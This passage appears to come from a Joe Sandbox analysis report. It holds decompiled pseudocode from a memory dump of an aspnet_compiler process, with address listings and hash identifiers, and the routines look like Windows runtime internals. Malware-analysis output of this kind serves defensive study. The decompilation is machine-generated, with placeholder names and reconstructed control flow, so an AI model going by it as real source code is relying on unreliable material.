                          						_t64 = E01439520();
                          						goto L15;
                          					} else {
                          						while(1) {
                          							_t97 =  &_v8;
                          							_t64 = E0142E18B(_t109 + 4, _t97, 4, _t88, 0);
                          							if(_t64 == 0x102) {
                          								break;
                          							}
                          							_t93 =  *(_t109 + 4);
                          							_v8 = _t93;
                          							if((_t93 & 0x00000002) != 0) {
                          								continue;
                          							}
                          							L15:
                          							if(_t64 == 0x102) {
                          								break;
                          							}
                          							_t89 = _v24;
                          							if(_t64 < 0) {
                          								L0144DF30(_t93, _t97, _t64);
                          								_push(_t93);
                          								_t98 = _t97 | 0xffffffff;
                          								__eflags =  *0x14e6901;
                          								_push(_t109);
                          								_v52 = _t98;
                          								if( *0x14e6901 != 0) {
                          									_push(0);
                          									_push(1);
                          									_push(0);
                          									_push(0x100003);
                          									_push( &_v12);
                          									_t72 = E01439980();
                          									__eflags = _t72;
                          									if(_t72 < 0) {
                          										_v12 = _t98 | 0xffffffff;
                          									}
                          								}
                          								asm("lock cmpxchg [ecx], edx");
                          								_t111 = 0;
                          								__eflags = 0;
                          								if(0 != 0) {
                          									__eflags = _v12 - 0xffffffff;
                          									if(_v12 != 0xffffffff) {
                          										_push(_v12);
                          										E014395D0();
                          									}
                          								} else {
                          									_t111 = _v12;
                          								}
                          								return _t111;
                          							} else {
                          								if(_t89 != 0) {
                          									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
                          									_t77 = E01417D50();
                          									__eflags = _t77;
                          									if(_t77 == 0) {
                          										_t64 = 0x7ffe0384;
                          									} else {
                          										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
                          									}
                          									__eflags =  *_t64;
                          									if( *_t64 != 0) {
                          										_t64 =  *[fs:0x30];
                          										__eflags = _t64[0x240] & 0x00000004;
                          										if((_t64[0x240] & 0x00000004) != 0) {
                          											_t78 = E01417D50();
                          											__eflags = _t78;
                          											if(_t78 == 0) {
                          												_t64 = 0x7ffe0385;
                          											} else {
                          												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
                          											}
                          											__eflags =  *_t64 & 0x00000020;
                          											if(( *_t64 & 0x00000020) != 0) {
                          												_t64 = E01477016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
                          											}
                          										}
                          									}
                          								}
                          								return _t64;
                          							}
                          						}
                          						_t97 = _t88;
                          						_t93 = _t109;
                          						E0148FDDA(_t97, _v12);
                          						_t105 =  *_t109;
                          						_t67 = _v12 + 1;
                          						_v12 = _t67;
                          						__eflags = _t105 - 0xffffffff;
                          						if(_t105 == 0xffffffff) {
                          							_t106 = 0;
                          							__eflags = 0;
                          						} else {
                          							_t106 =  *(_t105 + 0x14);
                          						}
                          						__eflags = _t67 - 2;
                          						if(_t67 > 2) {
                          							__eflags = _t109 - 0x14e5350;
                          							if(_t109 != 0x14e5350) {
                          								__eflags = _t106 - _v20;
                          								if(__eflags == 0) {
                          									_t93 = _t109;
                          									E0148FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
                          								}
                          							}
                          						}
                          						_push("RTL: Re-Waiting\n");
                          						_push(0);
                          						_push(0x65);
                          						_v20 = _t106;
                          						E01485720();
                          						_t104 = _v28;
                          						_t116 = _t116 + 0xc;
                          						continue;
                          					}
                          				}
                          			}




































                          0x013f2d8a
                          0x013f2d8a
                          0x013f2d92
                          0x013f2d96
                          0x013f2d9e
                          0x013f2da0
                          0x013f2da3
                          0x013f2da5
                          0x013f2da8
                          0x013f2dab
                          0x013f2db2
                          0x0144f9aa
                          0x0144f9ab
                          0x0144f9ae
                          0x0144f9ae
                          0x013f2db8
                          0x013f2dc2
                          0x0144f9b9
                          0x0144f9be
                          0x0144f9bf
                          0x0144f9bf
                          0x013f2dcf
                          0x0144f9c9
                          0x013f2dd5
                          0x013f2dd5
                          0x013f2dd5
                          0x013f2dde
                          0x013f2de1
                          0x013f2e70
                          0x013f2e72
                          0x013f2e72
                          0x013f2de7
                          0x013f2deb
                          0x013f2e7c
                          0x013f2e83
                          0x013f2e85
                          0x013f2e8b
                          0x013f2e8d
                          0x013f2e92
                          0x013f2e92
                          0x013f2e85
                          0x013f2df1
                          0x013f2df7
                          0x013f2df9
                          0x013f2df9
                          0x013f2dfc
                          0x013f2dff
                          0x013f2e02
                          0x00000000
                          0x013f2e05
                          0x013f2e0c
                          0x0144f9d9
                          0x013f2e12
                          0x013f2e12
                          0x013f2e12
                          0x013f2e1a
                          0x0144f9e3
                          0x0144f9e9
                          0x0144f9f0
                          0x0144f9f6
                          0x0144f9f8
                          0x0144f9f8
                          0x0144f9f0
                          0x013f2e23
                          0x0144fa02
                          0x0144fa03
                          0x0144fa05
                          0x0144fa06
                          0x00000000
                          0x013f2e29
                          0x013f2e29
                          0x013f2e2e
                          0x013f2e34
                          0x013f2e3e
                          0x00000000
                          0x00000000
                          0x013f2e44
                          0x013f2e47
                          0x013f2e4d
                          0x00000000
                          0x00000000
                          0x013f2e4f
                          0x013f2e54
                          0x00000000
                          0x00000000
                          0x013f2e5a
                          0x013f2e5f
                          0x013f2e9a
                          0x013f2ea4
                          0x013f2ea5
                          0x013f2ea8
                          0x013f2eaf
                          0x013f2eb2
                          0x013f2eb5
                          0x0144fae9
                          0x0144faeb
                          0x0144faed
                          0x0144faef
                          0x0144faf7
                          0x0144faf8
                          0x0144fafd
                          0x0144faff
                          0x0144fb04
                          0x0144fb04
                          0x0144faff
                          0x013f2ec0
                          0x013f2ec4
                          0x013f2ec6
                          0x013f2ec8
                          0x0144fb14
                          0x0144fb18
                          0x0144fb1e
                          0x0144fb21
                          0x0144fb21
                          0x013f2ece
                          0x013f2ece
                          0x013f2ece
                          0x013f2ed7
                          0x013f2e61
                          0x013f2e63
                          0x0144fa6b
                          0x0144fa71
                          0x0144fa76
                          0x0144fa78
                          0x0144fa8a
                          0x0144fa7a
                          0x0144fa83
                          0x0144fa83
                          0x0144fa8f
                          0x0144fa91
                          0x0144fa97
                          0x0144fa9d
                          0x0144faa4
                          0x0144faaa
                          0x0144faaf
                          0x0144fab1
                          0x0144fac3
                          0x0144fab3
                          0x0144fabc
                          0x0144fabc
                          0x0144fac8
                          0x0144facb
                          0x0144fadf
                          0x0144fadf
                          0x0144facb
                          0x0144faa4
                          0x0144fa91
                          0x013f2e6f
                          0x013f2e6f
                          0x013f2e5f
                          0x0144fa13
                          0x0144fa15
                          0x0144fa17
                          0x0144fa1f
                          0x0144fa21
                          0x0144fa22
                          0x0144fa25
                          0x0144fa28
                          0x0144fa2f
                          0x0144fa2f
                          0x0144fa2a
                          0x0144fa2a
                          0x0144fa2a
                          0x0144fa31
                          0x0144fa34
                          0x0144fa36
                          0x0144fa3c
                          0x0144fa3e
                          0x0144fa41
                          0x0144fa43
                          0x0144fa45
                          0x0144fa45
                          0x0144fa41
                          0x0144fa3c
                          0x0144fa4a
                          0x0144fa4f
                          0x0144fa51
                          0x0144fa53
                          0x0144fa56
                          0x0144fa5b
                          0x0144fa5e
                          0x00000000
                          0x0144fa5e
                          0x013f2e23

                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID: RTL: Re-Waiting
                          • API String ID: 0-316354757
                          • Opcode ID: 6055edfc7482726be8608def684ec0a799a8a5646049cf4b51814880eb4f3236
                          • Instruction ID: f698aaa8907a3ace89478f7d6ae0c7170ce1cf5bc5f4962f8cfc2d8b44217d4b
                          • Opcode Fuzzy Hash: 6055edfc7482726be8608def684ec0a799a8a5646049cf4b51814880eb4f3236
                          • Instruction Fuzzy Hash: A561F171A00645DBEB22DF6CC844B7F7BA4EB54718F24026EEA25A73E1C734D9458781
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 80%
                          			E014C0EA5(void* __ecx, void* __edx) {
                          				signed int _v20;
                          				char _v24;
                          				intOrPtr _v28;
                          				unsigned int _v32;
                          				signed int _v36;
                          				intOrPtr _v40;
                          				char _v44;
                          				intOrPtr _v64;
                          				void* __ebx;
                          				void* __edi;
                          				signed int _t58;
                          				unsigned int _t60;
                          				intOrPtr _t62;
                          				char* _t67;
                          				char* _t69;
                          				void* _t80;
                          				void* _t83;
                          				intOrPtr _t93;
                          				intOrPtr _t115;
                          				char _t117;
                          				void* _t120;
                          
                          				_t83 = __edx;
                          				_t117 = 0;
                          				_t120 = __ecx;
                          				_v44 = 0;
                          				if(E014BFF69(__ecx,  &_v44,  &_v32) < 0) {
                          					L24:
                          					_t109 = _v44;
                          					if(_v44 != 0) {
                          						E014C1074(_t83, _t120, _t109, _t117, _t117);
                          					}
                          					L26:
                          					return _t117;
                          				}
                          				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
                          				_t5 = _t83 + 1; // 0x1
                          				_v36 = _t5 << 0xc;
                          				_v40 = _t93;
                          				_t58 =  *(_t93 + 0xc) & 0x40000000;
                          				asm("sbb ebx, ebx");
                          				_t83 = ( ~_t58 & 0x0000003c) + 4;
                          				if(_t58 != 0) {
                          					_push(0);
                          					_push(0x14);
                          					_push( &_v24);
                          					_push(3);
                          					_push(_t93);
                          					_push(0xffffffff);
                          					_t80 = E01439730();
                          					_t115 = _v64;
                          					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
                          						_push(_t93);
                          						E014BA80D(_t115, 1, _v20, _t117);
                          						_t83 = 4;
                          					}
                          				}
                          				if(E014BA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
                          					goto L24;
                          				}
                          				_t60 = _v32;
                          				_t97 = (_t60 != 0x100000) + 1;
                          				_t83 = (_v44 -  *0x14e8b04 >> 0x14) + (_v44 -  *0x14e8b04 >> 0x14);
                          				_v28 = (_t60 != 0x100000) + 1;
                          				_t62 = _t83 + (_t60 >> 0x14) * 2;
                          				_v40 = _t62;
                          				if(_t83 >= _t62) {
                          					L10:
                          					asm("lock xadd [eax], ecx");
                          					asm("lock xadd [eax], ecx");
                          					if(E01417D50() == 0) {
                          						_t67 = 0x7ffe0380;
                          					} else {
                          						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                          					}
                          					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                          						E014B138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
                          					}
                          					if(E01417D50() == 0) {
                          						_t69 = 0x7ffe0388;
                          					} else {
                          						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                          					}
                          					if( *_t69 != 0) {
                          						E014AFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
                          					}
                          					if(( *0x14e8724 & 0x00000008) != 0) {
                          						E014B52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
                          					}
                          					_t117 = _v44;
                          					goto L26;
                          				}
                          				while(E014C15B5(0x14e8ae4, _t83, _t97, _t97) >= 0) {
                          					_t97 = _v28;
                          					_t83 = _t83 + 2;
                          					if(_t83 < _v40) {
                          						continue;
                          					}
                          					goto L10;
                          				}
                          				goto L24;
                          			}
























                          0x014c0eb7
                          0x014c0eb9
                          0x014c0ec0
                          0x014c0ec2
                          0x014c0ecd
                          0x014c105b
                          0x014c105b
                          0x014c1061
                          0x014c1066
                          0x014c1066
                          0x014c106b
                          0x014c1073
                          0x014c1073
                          0x014c0ed3
                          0x014c0ed6
                          0x014c0edc
                          0x014c0ee0
                          0x014c0ee7
                          0x014c0ef0
                          0x014c0ef5
                          0x014c0efa
                          0x014c0efc
                          0x014c0efd
                          0x014c0f03
                          0x014c0f04
                          0x014c0f06
                          0x014c0f07
                          0x014c0f09
                          0x014c0f0e
                          0x014c0f14
                          0x014c0f23
                          0x014c0f2d
                          0x014c0f34
                          0x014c0f34
                          0x014c0f14
                          0x014c0f52
                          0x00000000
                          0x00000000
                          0x014c0f58
                          0x014c0f73
                          0x014c0f74
                          0x014c0f79
                          0x014c0f7d
                          0x014c0f80
                          0x014c0f86
                          0x014c0fab
                          0x014c0fb5
                          0x014c0fc6
                          0x014c0fd1
                          0x014c0fe3
                          0x014c0fd3
                          0x014c0fdc
                          0x014c0fdc
                          0x014c0feb
                          0x014c1009
                          0x014c1009
                          0x014c1015
                          0x014c1027
                          0x014c1017
                          0x014c1020
                          0x014c1020
                          0x014c102f
                          0x014c103c
                          0x014c103c
                          0x014c1048
                          0x014c1050
                          0x014c1050
                          0x014c1055
                          0x00000000
                          0x014c1055
                          0x014c0f88
                          0x014c0f9e
                          0x014c0fa2
                          0x014c0fa9
                          0x00000000
                          0x00000000
                          0x00000000
                          0x014c0fa9
                          0x00000000

                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID: `
                          • API String ID: 0-2679148245
                          • Opcode ID: f1b3c5d7756203ea15acdbd3d7144935303afa75672b35f1027265a92506407d
                          • Instruction ID: 88f6c203128a36761a0359ff2ac11cc4d92998fc19e346254b66ae0b97c6740c
                          • Opcode Fuzzy Hash: f1b3c5d7756203ea15acdbd3d7144935303afa75672b35f1027265a92506407d
                          • Instruction Fuzzy Hash: 6651D1B4304342DFD365DF29D980B2BBBE5EBD4B04F04092EFA86876A1D670E846C761
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 75%
                          			E0142F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
                          				intOrPtr _v8;
                          				intOrPtr _v12;
                          				intOrPtr _v16;
                          				char* _v20;
                          				intOrPtr _v24;
                          				char _v28;
                          				intOrPtr _v32;
                          				char _v36;
                          				char _v44;
                          				char _v52;
                          				intOrPtr _v56;
                          				char _v60;
                          				intOrPtr _v72;
                          				void* _t51;
                          				void* _t58;
                          				signed short _t82;
                          				short _t84;
                          				signed int _t91;
                          				signed int _t100;
                          				signed short* _t103;
                          				void* _t108;
                          				intOrPtr* _t109;
                          
                          				_t103 = __ecx;
                          				_t82 = __edx;
                          				_t51 = E01414120(0, __ecx, 0,  &_v52, 0, 0, 0);
                          				if(_t51 >= 0) {
                          					_push(0x21);
                          					_push(3);
                          					_v56 =  *0x7ffe02dc;
                          					_v20 =  &_v52;
                          					_push( &_v44);
                          					_v28 = 0x18;
                          					_push( &_v28);
                          					_push(0x100020);
                          					_v24 = 0;
                          					_push( &_v60);
                          					_v16 = 0x40;
                          					_v12 = 0;
                          					_v8 = 0;
                          					_t58 = E01439830();
                          					_t87 =  *[fs:0x30];
                          					_t108 = _t58;
                          					L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
                          					if(_t108 < 0) {
                          						L11:
                          						_t51 = _t108;
                          					} else {
                          						_push(4);
                          						_push(8);
                          						_push( &_v36);
                          						_push( &_v44);
                          						_push(_v60);
                          						_t108 = E01439990();
                          						if(_t108 < 0) {
                          							L10:
                          							_push(_v60);
                          							E014395D0();
                          							goto L11;
                          						} else {
                          							_t109 = L01414620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
                          							if(_t109 == 0) {
                          								_t108 = 0xc0000017;
                          								goto L10;
                          							} else {
                          								_t21 = _t109 + 0x18; // 0x18
                          								 *((intOrPtr*)(_t109 + 4)) = _v60;
                          								 *_t109 = 1;
                          								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
                          								 *(_t109 + 0xe) = _t82;
                          								 *((intOrPtr*)(_t109 + 8)) = _v56;
                          								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
                          								E0143F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
                          								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                          								 *((short*)(_t109 + 0xc)) =  *_t103;
                          								_t91 =  *_t103 & 0x0000ffff;
                          								_t100 = _t91 & 0xfffffffe;
                          								_t84 = 0x5c;
                          								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
                          									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
                          										_push(_v60);
                          										E014395D0();
                          										L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
                          										_t51 = 0xc0000106;
                          									} else {
                          										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
                          										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                          										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
                          										goto L5;
                          									}
                          								} else {
                          									L5:
                          									 *_a4 = _t109;
                          									_t51 = 0;
                          								}
                          							}
                          						}
                          					}
                          				}
                          				return _t51;
                          			}

























                          0x0142f0d3
                          0x0142f0d9
                          0x0142f0e0
                          0x0142f0e7
                          0x0142f0f2
                          0x0142f0f4
                          0x0142f0f8
                          0x0142f100
                          0x0142f108
                          0x0142f10d
                          0x0142f115
                          0x0142f116
                          0x0142f11f
                          0x0142f123
                          0x0142f124
                          0x0142f12c
                          0x0142f130
                          0x0142f134
                          0x0142f13d
                          0x0142f144
                          0x0142f14b
                          0x0142f152
                          0x0146bab0
                          0x0146bab0
                          0x0142f158
                          0x0142f158
                          0x0142f15a
                          0x0142f160
                          0x0142f165
                          0x0142f166
                          0x0142f16f
                          0x0142f173
                          0x0146baa7
                          0x0146baa7
                          0x0146baab
                          0x00000000
                          0x0142f179
                          0x0142f18d
                          0x0142f191
                          0x0146baa2
                          0x00000000
                          0x0142f197
                          0x0142f19b
                          0x0142f1a2
                          0x0142f1a9
                          0x0142f1af
                          0x0142f1b2
                          0x0142f1b6
                          0x0142f1b9
                          0x0142f1c4
                          0x0142f1d8
                          0x0142f1df
                          0x0142f1e3
                          0x0142f1eb
                          0x0142f1ee
                          0x0142f1f4
                          0x0142f20f
                          0x0146bab7
                          0x0146babb
                          0x0146bacc
                          0x0146bad1
                          0x0142f215
                          0x0142f218
                          0x0142f226
                          0x0142f22b
                          0x00000000
                          0x0142f22b
                          0x0142f1f6
                          0x0142f1f6
                          0x0142f1f9
                          0x0142f1fb
                          0x0142f1fb
                          0x0142f1f4
                          0x0142f191
                          0x0142f173
                          0x0142f152
                          0x0142f203

                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID: @
                          • API String ID: 0-2766056989
                          • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                          • Instruction ID: 2492db53f1e265e8cdd61be078a7364b9900a30423487880d9276fe2843e85f7
                          • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                          • Instruction Fuzzy Hash: 94518E716047119FC321DF19C840A6BBBF8FF98714F108A2EF995876A0E7B4E944CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 75%
                          			E01473540(intOrPtr _a4) {
                          				signed int _v12;
                          				intOrPtr _v88;
                          				intOrPtr _v92;
                          				char _v96;
                          				char _v352;
                          				char _v1072;
                          				intOrPtr _v1140;
                          				intOrPtr _v1148;
                          				char _v1152;
                          				char _v1156;
                          				char _v1160;
                          				char _v1164;
                          				char _v1168;
                          				char* _v1172;
                          				short _v1174;
                          				char _v1176;
                          				char _v1180;
                          				char _v1192;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				void* __ebp;
                          				short _t41;
                          				short _t42;
                          				intOrPtr _t80;
                          				intOrPtr _t81;
                          				signed int _t82;
                          				void* _t83;
                          
                          				_v12 =  *0x14ed360 ^ _t82;
                          				_t41 = 0x14;
                          				_v1176 = _t41;
                          				_t42 = 0x16;
                          				_v1174 = _t42;
                          				_v1164 = 0x100;
                          				_v1172 = L"BinaryHash";
                          				_t81 = E01430BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
                          				if(_t81 < 0) {
                          					L11:
                          					_t75 = _t81;
                          					E01473706(0, _t81, _t79, _t80);
                          					L12:
                          					if(_a4 != 0xc000047f) {
                          						E0143FA60( &_v1152, 0, 0x50);
                          						_v1152 = 0x60c201e;
                          						_v1148 = 1;
                          						_v1140 = E01473540;
                          						E0143FA60( &_v1072, 0, 0x2cc);
                          						_push( &_v1072);
                          						E0144DDD0( &_v1072, _t75, _t79, _t80, _t81);
                          						E01480C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
                          						_push(_v1152);
                          						_push(0xffffffff);
                          						E014397C0();
                          					}
                          					return E0143B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
                          				}
                          				_t79 =  &_v352;
                          				_t81 = E01473971(0, _a4,  &_v352,  &_v1156);
                          				if(_t81 < 0) {
                          					goto L11;
                          				}
                          				_t75 = _v1156;
                          				_t79 =  &_v1160;
                          				_t81 = E01473884(_v1156,  &_v1160,  &_v1168);
                          				if(_t81 >= 0) {
                          					_t80 = _v1160;
                          					E0143FA60( &_v96, 0, 0x50);
                          					_t83 = _t83 + 0xc;
                          					_push( &_v1180);
                          					_push(0x50);
                          					_push( &_v96);
                          					_push(2);
                          					_push( &_v1176);
                          					_push(_v1156);
                          					_t81 = E01439650();
                          					if(_t81 >= 0) {
                          						if(_v92 != 3 || _v88 == 0) {
                          							_t81 = 0xc000090b;
                          						}
                          						if(_t81 >= 0) {
                          							_t75 = _a4;
                          							_t79 =  &_v352;
                          							E01473787(_a4,  &_v352, _t80);
                          						}
                          					}
                          					L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
                          				}
                          				_push(_v1156);
                          				E014395D0();
                          				if(_t81 >= 0) {
                          					goto L12;
                          				} else {
                          					goto L11;
                          				}
                          			}































                          0x01473552
                          0x0147355a
                          0x0147355d
                          0x01473566
                          0x01473567
                          0x0147357e
                          0x0147358f
                          0x014735a1
                          0x014735a5
                          0x0147366b
                          0x0147366b
                          0x0147366d
                          0x01473672
                          0x01473679
                          0x01473685
                          0x0147368d
                          0x0147369d
                          0x014736a7
                          0x014736b8
                          0x014736c6
                          0x014736c7
                          0x014736dc
                          0x014736e1
                          0x014736e7
                          0x014736e9
                          0x014736e9
                          0x01473703
                          0x01473703
                          0x014735b5
                          0x014735c0
                          0x014735c4
                          0x00000000
                          0x00000000
                          0x014735ca
                          0x014735d7
                          0x014735e2
                          0x014735e6
                          0x014735e8
                          0x014735f5
                          0x014735fa
                          0x01473603
                          0x01473604
                          0x01473609
                          0x0147360a
                          0x01473612
                          0x01473613
                          0x0147361e
                          0x01473622
                          0x01473628
                          0x0147362f
                          0x0147362f
                          0x01473636
                          0x01473638
                          0x0147363b
                          0x01473642
                          0x01473642
                          0x01473636
                          0x01473657
                          0x01473657
                          0x0147365c
                          0x01473662
                          0x01473669
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000

                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID: BinaryHash
                          • API String ID: 0-2202222882
                          • Opcode ID: c2c4d22ad03b96e70c61b1467d5022ef7ddcdc4ad0eb248ebea10c203211514a
                          • Instruction ID: 221de14f844f2c2797b0e6f63e1b44dbcbd8eed302551deb6f7202acba894419
                          • Opcode Fuzzy Hash: c2c4d22ad03b96e70c61b1467d5022ef7ddcdc4ad0eb248ebea10c203211514a
                          • Instruction Fuzzy Hash: 9F4157F2D0052D9BDB21DE51CC80FDEB77CAB54714F0045AAEA09AB260DB309E89DF95
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 71%
                          			E014C05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                          				signed int _v20;
                          				char _v24;
                          				signed int _v28;
                          				char _v32;
                          				signed int _v36;
                          				intOrPtr _v40;
                          				void* __ebx;
                          				void* _t35;
                          				signed int _t42;
                          				char* _t48;
                          				signed int _t59;
                          				signed char _t61;
                          				signed int* _t79;
                          				void* _t88;
                          
                          				_v28 = __edx;
                          				_t79 = __ecx;
                          				if(E014C07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
                          					L13:
                          					_t35 = 0;
                          					L14:
                          					return _t35;
                          				}
                          				_t61 = __ecx[1];
                          				_t59 = __ecx[0xf];
                          				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
                          				_v36 = _a8 << 0xc;
                          				_t42 =  *(_t59 + 0xc) & 0x40000000;
                          				asm("sbb esi, esi");
                          				_t88 = ( ~_t42 & 0x0000003c) + 4;
                          				if(_t42 != 0) {
                          					_push(0);
                          					_push(0x14);
                          					_push( &_v24);
                          					_push(3);
                          					_push(_t59);
                          					_push(0xffffffff);
                          					if(E01439730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
                          						_push(_t61);
                          						E014BA80D(_t59, 1, _v20, 0);
                          						_t88 = 4;
                          					}
                          				}
                          				_t35 = E014BA854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
                          				if(_t35 < 0) {
                          					goto L14;
                          				}
                          				E014C1293(_t79, _v40, E014C07DF(_t79, _v28,  &_a4,  &_a8, 1));
                          				if(E01417D50() == 0) {
                          					_t48 = 0x7ffe0380;
                          				} else {
                          					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                          				}
                          				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                          					E014B138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
                          				}
                          				goto L13;
                          			}

















                          0x014c05c5
                          0x014c05ca
                          0x014c05d3
                          0x014c06db
                          0x014c06db
                          0x014c06dd
                          0x014c06e3
                          0x014c06e3
                          0x014c05dd
                          0x014c05e7
                          0x014c05f6
                          0x014c0600
                          0x014c0607
                          0x014c0610
                          0x014c0615
                          0x014c061a
                          0x014c061c
                          0x014c061e
                          0x014c0624
                          0x014c0625
                          0x014c0627
                          0x014c0628
                          0x014c0631
                          0x014c0640
                          0x014c064d
                          0x014c0654
                          0x014c0654
                          0x014c0631
                          0x014c066d
                          0x014c0674
                          0x00000000
                          0x00000000
                          0x014c0692
                          0x014c069e
                          0x014c06b0
                          0x014c06a0
                          0x014c06a9
                          0x014c06a9
                          0x014c06b8
                          0x014c06d6
                          0x014c06d6
                          0x00000000

                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID: `
                          • API String ID: 0-2679148245
                          • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                          • Instruction ID: c75b110e106ea1bafd5407dd81aeb6d20cdb28d6ff362259b8f71346652eeb42
                          • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                          • Instruction Fuzzy Hash: 4431F536300306ABE750DE29CC85F977BD9ABD4B54F14422EFA589B2A0D770E904CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 72%
                          			E01473884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                          				char _v8;
                          				intOrPtr _v12;
                          				intOrPtr* _v16;
                          				char* _v20;
                          				short _v22;
                          				char _v24;
                          				intOrPtr _t38;
                          				short _t40;
                          				short _t41;
                          				void* _t44;
                          				intOrPtr _t47;
                          				void* _t48;
                          
                          				_v16 = __edx;
                          				_t40 = 0x14;
                          				_v24 = _t40;
                          				_t41 = 0x16;
                          				_v22 = _t41;
                          				_t38 = 0;
                          				_v12 = __ecx;
                          				_push( &_v8);
                          				_push(0);
                          				_push(0);
                          				_push(2);
                          				_t43 =  &_v24;
                          				_v20 = L"BinaryName";
                          				_push( &_v24);
                          				_push(__ecx);
                          				_t47 = 0;
                          				_t48 = E01439650();
                          				if(_t48 >= 0) {
                          					_t48 = 0xc000090b;
                          				}
                          				if(_t48 != 0xc0000023) {
                          					_t44 = 0;
                          					L13:
                          					if(_t48 < 0) {
                          						L16:
                          						if(_t47 != 0) {
                          							L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
                          						}
                          						L18:
                          						return _t48;
                          					}
                          					 *_v16 = _t38;
                          					 *_a4 = _t47;
                          					goto L18;
                          				}
                          				_t47 = L01414620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                          				if(_t47 != 0) {
                          					_push( &_v8);
                          					_push(_v8);
                          					_push(_t47);
                          					_push(2);
                          					_push( &_v24);
                          					_push(_v12);
